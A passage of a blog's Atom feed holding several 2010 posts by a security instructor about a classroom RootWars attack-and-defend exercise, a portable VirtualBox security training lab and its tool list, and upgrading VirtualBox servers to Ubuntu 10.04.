href='http://www.blogger.com/feeds/6339171303043697983/posts/default/6121208819424534249'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/6121208819424534249'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/05/metasploitable.html' title='Metasploitable'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-8043885626105847599</id><published>2010-05-13T19:45:00.000-07:00</published><updated>2010-06-13T19:43:17.523-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rootwars'/><title type='text'>RootWars - Day Two</title><content type='html'>&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Well, yesterday was an eventful day.  Team 1 was able to obtain root within 15 minutes using one of the backdoors enabled in the default RootWars VM image.  They were successful in locking Team 2 out of their system.  Team 2 had to reboot the image in single user mode and make some adjustments to prepare themselves for week 3.  There are two lessons that I truly hoped the students walked away with: &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Incident Handling skills are crucial.  All of the hacking and penetration testing skills are glamorous and sexy but if you cannot defend you will be hacked.  If you cannot identify that an intruder is on your system, then you are defenseless at that point.  And if you cannot remove the intruder from your system efficiently then you are subject to his whims and mercy (or lack thereof).   &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Be aggressive.  Not just in your offense, but in your defense as well.  You cannot avail yourself of all of the backdoors, Trojans and rootkits against your opponent in a RootWars scenario until you have aggressively searched for, found and eradicated them from your own.  Then you can leverage that knowledge in attacks against your adversary.  This is truly a case where your best offense is a good defense. &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;I shared quite a few tips with Team 2 and a few with Team 1 in an effort to even things up a bit and also make sure that the frustration levels involved remain tolerable. &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;All in all the exercise is proceeding well.  Team 1 will need to work on sportsmanship conduct as we proceed but I have addressed that with them personally.  This exercise is supposed to be fun and a learning experience for everyone involved.  I look forward to week 3 and hope that all of the students do as well.  Until next time. &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;May Your Skill Prevail.&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-8043885626105847599?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/8043885626105847599/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=8043885626105847599&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8043885626105847599'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8043885626105847599'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/05/rootwars-day-two.html' title='RootWars - Day Two'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-5481291315582677559</id><published>2010-05-10T03:25:00.000-07:00</published><updated>2010-06-13T19:43:38.231-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu 10.04'/><category scheme='http://www.blogger.com/atom/ns#' term='Virtualbox'/><category scheme='http://www.blogger.com/atom/ns#' term='dkms'/><category scheme='http://www.blogger.com/atom/ns#' term='vboxdrv'/><title type='text'>Upgraded Virutalbox Servers to Ubuntu 10.04 LTS</title><content type='html'>&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;I took a gamble at 2:00am and upgraded a pair of Ubuntu Virtualbox servers in the office.  For the most part the upgrade went smoothly.  I like the new color scheme and the aesthetic changes made.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;As far as Virtualbox is concerned, even with dkms installed it failed to build the new kernel modules properly.  This can be done fairly quickly and painlessly as root:&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;# /etc/init.d/vboxdrv setup&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;If all goes well this will purge previous kernel modules and build new ones based on the 10.04 kernel 2.6.32.22-generic-pae sources.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;The Windows guest additions seem to have an issue with wanting to always be in full screen mode, I'll have a look at that tomorrow and when I figure it out I'll post the results here.&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-5481291315582677559?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/5481291315582677559/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=5481291315582677559&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/5481291315582677559'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/5481291315582677559'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/05/upgraded-virutalbox-servers-to-ubuntu.html' title='Upgraded Virutalbox Servers to Ubuntu 10.04 LTS'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-1034761191780943151</id><published>2010-05-09T22:19:00.000-07:00</published><updated>2010-06-13T19:44:12.760-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Mobile Security Training Lab'/><title type='text'>Mobile Security Training Lab 1.0</title><content type='html'>&lt;span style="font-family: verdana;"&gt;      &lt;span style="font-family: Verdana,sans-serif; font-size: small;"&gt;During my tenure at ITT providing classroom labs and a bi-weekly security workshop I found the distinct need to be able to easily provide a security-training environment that could provide the following elements:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;ol style="font-family: Verdana,sans-serif;"&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Separation:  The school lab computers are connected to the corporate network.  This is less than ideal for working with information security topics.  &lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Monitoring:  I wanted monitoring platforms for two reasons, first to be able to monitor the network activity of students, secondly to teach them how to monitoring using open source monitoring tools and platforms.  &lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Portability:  I’m there 4 times a week so I need to be able to pick up my environment and take it home with me every evening so I can make needed adjustments, perform upgrades, etc.  &lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Resiliency: I require an environment that can take a licking and be restarted to keep ticking.  Virtualization really fits the bill here.&lt;/span&gt; &lt;/li&gt;&lt;/ol&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Lets address the solutions in the same order so that we can keep them straight.     &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;ul style="font-family: Verdana,sans-serif;"&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Separation:     We needed to be able to have our own network to work on, four times a week.  Clearwire really does the job for this scenario.  It’s inexpensive ($55/month for a standard modem and a USB modem), it has a decent connection speed and is quick to setup/teardown.  This is been teamed with a Linksys WRT150N running DD-WRT.  This runs WPA (I have students with older laptops so I had to back off of WPA2) with a key that I rotate every so often.     &lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul style="font-family: Verdana,sans-serif;"&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Monitoring:     Since I own the network I am free to utilize whatever monitoring tools and techniques that are at my disposal.  I attempted to use HeX Live in as a Virtualbox appliance but had trouble with the virtualized interfaces being able to sniff traffic all the time.  Over the last week I have opted to use Securix-NSM.  It works right out of the box and supports sguil servers, which make me very happy (I prefer sguil over BASE).  In addition to these live CDs converted into Virtualbox appliances I will occasionally utilize tcpdump or tshark for a quick and dirty pcap grab and analyze the output in Wireshark. &lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul style="font-family: Verdana,sans-serif;"&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Portability:     This one is huge.  I need to be able to work on labs while I am away from the college and then run them (or disseminate them) while I’m there.       Laptops running Virtualbox to the rescue!  I must admit, before recent training tenure I was a VMWare fanboy. I have definitely flip flopped in that regard, I have only retained VMWare Fusion on my MacBook Pro because I like the Windows VM integration tools.  So three laptops get the job done (yes, I could carry less but I use three for work anyway).       &lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul style="font-family: Verdana,sans-serif;"&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Resiliency:     Another big one for me, it’s not so much when we are working on Wireshark or tcpdump labs or writing snort signatures.  But when we are using Metasploit, or exploits from other sources its nice to just roll back to a snapshot of a virtual machine and spin it back up again.     This wouldn’t be complete without a peek into the actual environment.  I am using the following Virtualbox appliances that I created for various purposes: &lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small; font-weight: bold;"&gt;Network Penetration Testing&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;BackTrack 4 &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Final  Pentoo 2009.0     &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small; font-weight: bold;"&gt;Web Application Penetration Testing     &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;OWASP  Live CD&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Samurai-WTF      &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small; font-weight: bold;"&gt;VOIP Security Assessments&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Viper-VAST     &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small; font-weight: bold;"&gt;Digital Forensics     &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Helix 1.9  &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;SANS SIFT 2.0     &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small; font-weight: bold;"&gt;Network Security Monitoring&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small; font-style: italic;"&gt;While in bridged networking mode I have been unable to get any virtual adapters to sniff properly except PCnet-FAST III.  You could also put your environment in Virtualbox’s “Internal Networking” which behaves as a hub as opposed to a switch.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;HeX Live 2.0  &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Securix-NSM  OSSIM 2.2.1  &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;OpenIDS 2              &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small; font-weight: bold;"&gt;Firewalls     &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small; font-style: italic;"&gt;You will need to configure multiple virtual adapters for these to function as created.  See the point above considering the sniffing interfaces.     &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Honeywall Roo 1.4  &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;pfSense 1.2.3        &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small; font-weight: bold;"&gt;Hacking Challenges&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small; font-style: italic;"&gt;The first three images are bootable, so you don’t need to create a big hard disk for them. I created a “small” 1GB disk for each of them, and have the VMs configured to mount their respective ISOs on boot. pWnOS is a VMware appliance and will require importing and tweaking to work correctly in Virtualbox.     &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;De-ice.net 100  &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;De-ice.net 110  &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Damn Vulnerable Linux 1.5  &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;pWnOS 1.0     &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small; font-weight: bold;"&gt;Vulnerable Hosts     &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Windows 2000  SP1 (Professional, Server, Advanced Server)  &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Windows 2003 SP0  &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Windows XP SP2  &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Ubuntu Server 7.04  &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;AsteriskNOW  &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Elastix     &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small; font-weight: bold;"&gt;Generic Hosts&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Opensolaris 2009.06  &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Windows 7 Ultimate     &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small; font-weight: bold;"&gt;Rootwars     &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Custom Redhat 9 appliance     &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;All of the appliances are on all 3 laptops affording me maximum flexibility in developing configurations and scenarios for the students to learn from.     The remaining issues that didn’t make the master list as distinct topics; time and cost.  It took awhile to put together these appliances in Virtualbox but it was time well spent.  Now, regardless of where I deliver training I can focus on that rather than what unpredictable elements another environment might bring.     &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;That leaves us with cost.  Most of these were developed with Open Source software so the only licenses that came into play were the Windows ones.  I have all of the W2K OSes from the MS Select Program a long, long, long time ago.  I used one of the licenses from IRON::Guard for Windows XP SP2 and Windows 7 respectively.  So, for very little cost I have a kick ass portable training environment I can take anywhere.     I hope that this write up helps someone cut some corners off of their development time to put together a mobile lab or give them inspiration to improve upon my humble offerings.  Till next time.     &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;May Your Skill Prevail.   &lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-1034761191780943151?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/1034761191780943151/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=1034761191780943151&amp;isPopup=true' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/1034761191780943151'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/1034761191780943151'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/05/during-my-tenure-at-itt-providing.html' title='Mobile Security Training Lab 1.0'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-854155426916483188</id><published>2010-05-06T00:43:00.000-07:00</published><updated>2010-06-13T19:44:43.135-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rootwars'/><title type='text'>RootWars Elements</title><content type='html'>&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;The Goal:&lt;br /&gt;&lt;br /&gt;To provide a robust yet portable (I picked up this lab from home and moved it to the school and back today and have every Saturday for the last 12 weeks) RootWars training solution for students of varying skill levels and security disciplines.&lt;br /&gt;&lt;br /&gt;The Tools:&lt;br /&gt;&lt;br /&gt;Linksys WRT150N - DD-WRT firmware - Allows participants to connect via WPA encrypted wireless for convenience. Syslog forwarding to Bastion host, also provides static DHCP addresses to laptops.&lt;br /&gt;&lt;br /&gt;Clearwire modem – Portable Internet – Allows for relatively fast Internet access in a portable form factor.&lt;br /&gt;&lt;br /&gt;Main computer – Quad Core Intel, 4GB RAM, 500GB HD, Opensolaris 2009.06, Virtualbox 3.1.6&lt;br /&gt;&lt;br /&gt;The Island -Bastion host - running over sshd, centralized logging over syslog, Stratum 3 NTP time server, IRC server (with SSL enabled) with Eggdrop bot (persistent channels and ease of administration). Runs tcpdump full content data capture as a backup to the NSM VM.&lt;br /&gt;&lt;br /&gt;Rootwars VMs – Redhat 9 Virtualbox appliances.  Running rootsh.pl to keep track of all commands issued as root.  Incident Handling included with 9 backdoors, 4 trojans and 2 rootkits.  Syslog sent to Bastion host, NTP time synced with Bastion host.&lt;br /&gt;&lt;br /&gt;Securix-NSM VM – Running sguild server with ntop, also provides full content data capture using tshark running in ring buffer mode.&lt;br /&gt;&lt;br /&gt;Macbook Pro laptop – OSX 10.5.8 - Connected to projector, acting as operator of IRC channels via screen sessions, running sguil client and X11 forwarded wireshark session from NSM VM.&lt;br /&gt;&lt;br /&gt;Dell D600 laptop – Back|Track 4 Final - Runs regular nmap and other scans against RW VMs to verify that required services are up and running.  Acts as an NFS and SMB server for attached students to download files and utilities from.&lt;br /&gt;&lt;br /&gt;Samsung N110 laptop – Windows XP SP3 - The Jack of all trades, authoring MS Word docs (Rules of Conduct, Survival Guide and Kickoff documents), moving files around via WinSCP, acting as an FTP server for Virtualbox images, pcap files and more.&lt;br /&gt;&lt;br /&gt;The Time:&lt;br /&gt;&lt;br /&gt;All in all this was a lot of work...to the sum of approximately 151 hours over 10 days from concept to project deployment.  Not for the faint of heart but definitely worth it.&lt;br /&gt;&lt;br /&gt;I hope this is helpful for anyone considering a similar endeavor.&lt;br /&gt;&lt;br /&gt;May Your Skill Prevail.&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-854155426916483188?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/854155426916483188/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=854155426916483188&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/854155426916483188'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/854155426916483188'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/05/rootwars-elements_06.html' title='RootWars Elements'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-7856069742037090262</id><published>2010-05-05T23:30:00.000-07:00</published><updated>2010-06-13T19:45:14.491-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IRC'/><category scheme='http://www.blogger.com/atom/ns#' term='rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootwars'/><category scheme='http://www.blogger.com/atom/ns#' term='trojans'/><category scheme='http://www.blogger.com/atom/ns#' term='backdoors'/><title type='text'>Rootwars - Day One</title><content type='html'>&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Today was the Rootwars kickoff at ITT Tukwila 026.&lt;br /&gt;&lt;br /&gt;The Rootwars is running over a 4 hour class period for 3 weeks in succession.  This week was getting everyone logged into the bastion host properly, up and running on IRC and working on getting their virtual machine into a more defensible state (it has numerous backdoors, trojans and rootkits installed right out of the box).&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: 